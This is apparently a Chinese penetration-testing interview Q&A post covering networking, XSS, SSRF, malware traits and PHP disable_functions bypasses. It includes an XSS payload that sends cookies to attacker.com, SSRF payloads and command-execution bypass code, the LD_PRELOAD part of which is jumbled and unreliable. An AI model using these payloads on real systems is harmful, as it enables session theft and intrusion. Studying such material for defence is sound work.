2025年渗透测试面试题总结-215(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

六十一、主机被入侵处理流程

六十二、NAT(网络地址转换)

六十三、内网穿透

六十四、虚拟专用网络(VPN)

六十五-六十七、交换机与路由技术

六十八、IPv6地址表示

六十九、加密方式对比

七十、同源策略(SOP)

七十一、Cookie存储与访问

七十二、XSS盗取Cookie流程

[七十三、TCP vs UDP 及 SYN攻击](#七十三、TCP vs UDP 及 SYN攻击)

七十四、网络安全证书推荐

七十五、DVWA搭建步骤

七十六、渗透测试流程(PTES标准)

七十七、XSS防御方案

七十八、IIS服务器防护

七十九、虚拟机连接方式

八十、XSS盗Cookie登录条件

八十一、JNI函数名转换规则

[八十二、Frida vs Xposed](#八十二、Frida vs Xposed)

八十三、SSRF利用方式

八十四、宏病毒

八十五、APP加壳

八十六、WannaCry特征

八十七、ARM32寄存器用途

八十八、HTTPS握手技术

八十九-九十、绕过disable_functions执行命令

复制代码
六十一、主机被入侵,你会如何处理这件事自查解决方案:

六十二、 NAT(网络地址转换)协议

六十三、内网穿透

六十四、虚拟专用网络

六十五、二层交换机

六十六、路由技术

六十七、三层交换机

六十八、IPv6 地址表示

六十九、对称加密非对称加密?

七十、什么是同源策略?

七十一、cookie 存在哪里?可以打开吗

七十二、xss 如何盗取 cookie?

七十三、tcp、udp 的区别及 tcp 三次握手,syn 攻击?

七十四、证书要考哪些?

七十五、DVWA 是如何搭建的?

七十六、渗透测试的流程是什么

七十七、xss 如何防御

七十八、IIS 服务器应该做哪些方面的保护措施:

七十九、虚拟机的几种连接方式及原理

八十、xss 有 cookie 一定可以无用户名密码登录吗?

八十一、 JNI 函数在 java 中函数名为 com.didi.security.main,C 中的函数名是什么样的?

八十二、Frida 和 Xposed 框架?

八十三、SSRF 利用方式?

八十四、宏病毒?

八十五、APP 加壳?

八十六、勒索软件 Wanacry 的特征?蠕虫、僵尸病毒

八十七、ARM32 位指令中,返回值和返回地址保存在哪个寄存器中?

八十八、HTTPS 握手过程中用到哪些技术?

八十九、Linux 中 PHP 环境,已知 disable_functions=exec,passthrupopen,proc_open,shell_exec,system,

九十、请写出两种有可能实现任意命令执行的方式?

六十一、主机被入侵处理流程

  1. 隔离断网:立即断开主机网络(禁用网卡/防火墙阻断)
  2. 取证备份 :磁盘镜像、内存dump、系统日志(/var/log/、Windows事件日志)
  3. 入侵分析
    • 检查异常进程(ps -ef/tasklist
    • 排查启动项(crontab/msconfig
    • 分析网络连接(netstat -antp
  4. 漏洞定位 :检查未修复漏洞、弱口令、后门文件(如.bashrc恶意注入)
  5. 恢复重建:重装系统、修补漏洞、更改所有关联密码

六十二、NAT(网络地址转换)

类型 原理 应用场景
静态NAT 1个私网IP固定映射1个公网IP 服务器对外发布
动态NAT IP池动态分配公网地址 企业内网共享上网
PAT(NAPT) 多私网IP通过端口映射到1个公网IP 家庭路由器常用

六十三、内网穿透

原理 :通过公网服务器中转流量,绕过防火墙限制
工具

  • Ngrok :建立反向隧道,将内网服务暴露至 xxx.ngrok.io
  • Frp :通过客户端(frpc)与服务端(frps)实现端口映射
    风险:可能暴露内部服务,需配置访问认证

六十四、虚拟专用网络(VPN)

类型 协议 特点
IPSec VPN IKEv2/IPSec 网络层加密,支持站点到站点
SSL VPN TLS/DTLS 应用层加密,无需客户端
WireGuard UDP+噪声协议 高性能,现代加密算法

六十五-六十七、交换机与路由技术

设备 工作层级 核心功能
二层交换机 数据链路层 MAC地址学习,VLAN划分
路由器 网络层 IP路由转发,NAT,ACL
三层交换机 网络层 融合交换与路由,支持VLAN间路由

六十八、IPv6地址表示

  • 压缩规则 :省略前导0,连续0块用 :: 代替(仅限一次) 例:2001:0db8:0000:0000:0000:ff00:0042:83292001:db8::ff00:42:8329
  • 前缀/64 通常用于子网划分

六十九、加密方式对比

特性 对称加密(AES) 非对称加密(RSA)
密钥数量 1个共享密钥 公钥+私钥对
速度 快(适合大数据) 慢(适合密钥交换)
典型应用 文件加密、HTTPS内容加密 数字签名、SSL密钥协商

七十、同源策略(SOP)

定义 :禁止网页脚本访问不同源(协议+域名+端口均相同)的资源
绕过方法

  • CORS(服务端设置 Access-Control-Allow-Origin
  • JSONP(利用 <script> 标签跨域)

七十一、Cookie存储与访问

  • 存储位置
    • 浏览器本地(Chrome:chrome://settings/siteData
    • 文件路径(Windows:%AppData%\Local\Google\Chrome\User Data\Default\Cookies
  • 能否打开:可直接查看(需SQLite工具打开),但内容通常加密

七十二、XSS盗取Cookie流程

  1. 攻击者注入恶意脚本:<script>fetch('https://attacker.com?cookie='+document.cookie)</script>
  2. 用户访问含恶意脚本页面
  3. 浏览器自动发送Cookie至攻击者服务器
    防御 :设置Cookie为HttpOnly(禁止JS访问)

七十三、TCP vs UDP 及 SYN攻击

对比项 TCP(传输控制协议) UDP(用户数据报协议)
连接性 面向连接(三次握手) 无连接
可靠性 丢包重传、顺序保证 不保证可靠性
应用场景 Web、邮件等可靠传输 视频流、DNS查询

TCP三次握手

  1. Client → Server:SYN=1, seq=x
  2. Server → Client:SYN=1, ACK=1, seq=y, ack=x+1
  3. Client → Server:ACK=1, seq=x+1, ack=y+1

SYN攻击:伪造大量SYN包耗尽服务器资源,防御方案:

  • SYN Cookie(不保存半连接状态)
  • 限制每秒SYN请求数

七十四、网络安全证书推荐

证书 方向 等级
CEH 渗透测试 入门
OSCP 实战渗透 进阶
CISSP 安全管理 高级
CISP(中国) 信息安全认证 国家级

七十五、DVWA搭建步骤

  1. 环境:Apache + PHP 5.4-7.x + MySQL

  2. 步骤:

    复制代码
    bashwget https://github.com/digininja/DVWA/archive/master.zip unzip master.zip mv DVWA-master /var/www/html/dvwa chmod -R 777 /var/www/html/dvwa/config/
  3. 访问 http://localhost/dvwa/setup.php 创建数据库


七十六、渗透测试流程(PTES标准)

  1. 情报收集 :Whois扫描、子域名爆破(如subfinder
  2. 威胁建模:确定高危资产(如暴露的API接口)
  3. 漏洞分析 :结合Nessus扫描与手动测试
  4. 渗透利用 :使用Metasploit、自定义EXP
  5. 后渗透:权限维持(如添加后门账户)
  6. 报告输出:包含风险等级(CVSS评分)及修复建议

七十七、XSS防御方案

  • 输入过滤 :移除 <script>onerror 等危险标签
  • 输出编码 :HTML实体化(如 <&lt;
  • CSP策略 :设置 Content-Security-Policy: default-src 'self'
  • HttpOnly Cookie:防止JS读取敏感Cookie

七十八、IIS服务器防护

  1. 权限控制 :应用程序池账户降权(非Administrator
  2. 配置加固
    • 关闭不必要的扩展(如 .asp 若未使用)
    • 设置请求过滤(拒绝 ../ 路径穿越)
  3. 日志审计 :启用详细访问日志 + 实时监控(如ELK

七十九、虚拟机连接方式

方式 原理 典型场景
NAT 虚拟机共享宿主机IP 单机上网
桥接模式 虚拟机直接接入物理网络 模拟真实网络环境
Host-Only 仅宿主机与虚拟机互通 安全测试隔离环境

八十、XSS盗Cookie登录条件

不一定成功,需满足:

  1. Cookie未过期且未启用Secure(仅限HTTPS)
  2. 目标系统仅依赖Cookie认证(无二次验证)
  3. 攻击者能构造有效会话(如Session Fixation

八十一、JNI函数名转换规则

C函数名格式:Java_{包名}_{类名}_{方法名}
示例

复制代码
c`// Java: com.didi.security.main JNIEXPORT void JNICALL Java_com_didi_security_main(JNIEnv *env, jobject obj); `

⚠️ 包名中的.需替换为_


八十二、Frida vs Xposed

框架 注入方式 优势
Frida 动态注入(运行时) 支持多平台(Android/iOS)
Xposed 静态劫持(Zygote) 无需修改APK,稳定性高

八十三、SSRF利用方式

  1. 内网探测http://vuln.com/?url=http://192.168.1.1:8080
  2. 协议利用
    • file:///etc/passwd(读取本地文件)
    • gopher:// 攻击Redis未授权访问
  3. 绕过技巧 :使用DNS重绑定或进制IP编码(2130706433127.0.0.1

八十四、宏病毒

原理 :利用Office宏脚本(VBA)执行恶意代码
传播 :诱导用户启用宏(如"文档预览需启用宏")
防御:禁用Office宏执行 + 启用受保护的视图


八十五、APP加壳

目的 :防止反编译(代码混淆、反调试)
类型

  • 压缩壳:UPX(体积压缩)
  • 加密壳:DexProtector(运行时解密代码)

八十六、WannaCry特征

  1. 传播方式:利用EternalBlue漏洞(SMB协议)
  2. 行为特征
    • 加密文件扩展名变更为.WNCRYT
    • 内存驻留进程 tasksche.exe
    • 勒索信息文件 @Please_Read_Me@.txt
  3. 蠕虫属性:自动扫描内网传播,形成僵尸网络

八十七、ARM32寄存器用途

  • 返回值R0(32位)、R0-R1(64位)
  • 返回地址LR(Link Register,即R14)

八十八、HTTPS握手技术

  1. 非对称加密:RSA/ECDH协商会话密钥
  2. 证书验证:CA链校验(X.509标准)
  3. 对称加密:生成AES会话密钥加密传输
  4. 完整性校验:HMAC算法防篡改

八十九-九十、绕过disable_functions执行命令

方式1:LD_PRELOAD劫持

复制代码
php`// evil.c #include <stdlib.h> void system() { system("id > /tmp/pwned"); } bash``gcc -shared -fPIC evil.c -o evil.so PHP_VALUE auto_prepend_file="/tmp/evil.php" // 通过环境变量注入 `

方式2:FFI(PHP 7.4+)

复制代码
php`$ffi = FFI::cdef("int system(const char *command);"); $ffi->system("touch /tmp/pwned"); `

️ 需服务器安装php-ffi扩展且未禁用FFI

相关推荐
暖阳之下4 小时前
学习周报十九
学习·多模态·1024程序员节
幻世界4 小时前
【Unity开发小技巧】安卓ADB环境配置
1024程序员节
☆璇4 小时前
【Linux】应用层协议HTTP
网络·网络协议·http·1024程序员节
没有故事、有酒4 小时前
el-table选中行颜色
1024程序员节
Z_B_L4 小时前
问题记录--elementui中el-form初始化表单resetFields()方法使用时出现的问题
前端·javascript·vue.js·elementui·1024程序员节
new Vue()4 小时前
ruoyi vue3 自定义子路由面包屑处理
1024程序员节
OkGogooXSailboat4 小时前
flume的log4j日志无输出排查
java·flume·1024程序员节
银河系的一束光4 小时前
tomcat问题
1024程序员节
weixin_445476684 小时前
Vue 项目全局水印功能完整实现指南
vue·vue2·1024程序员节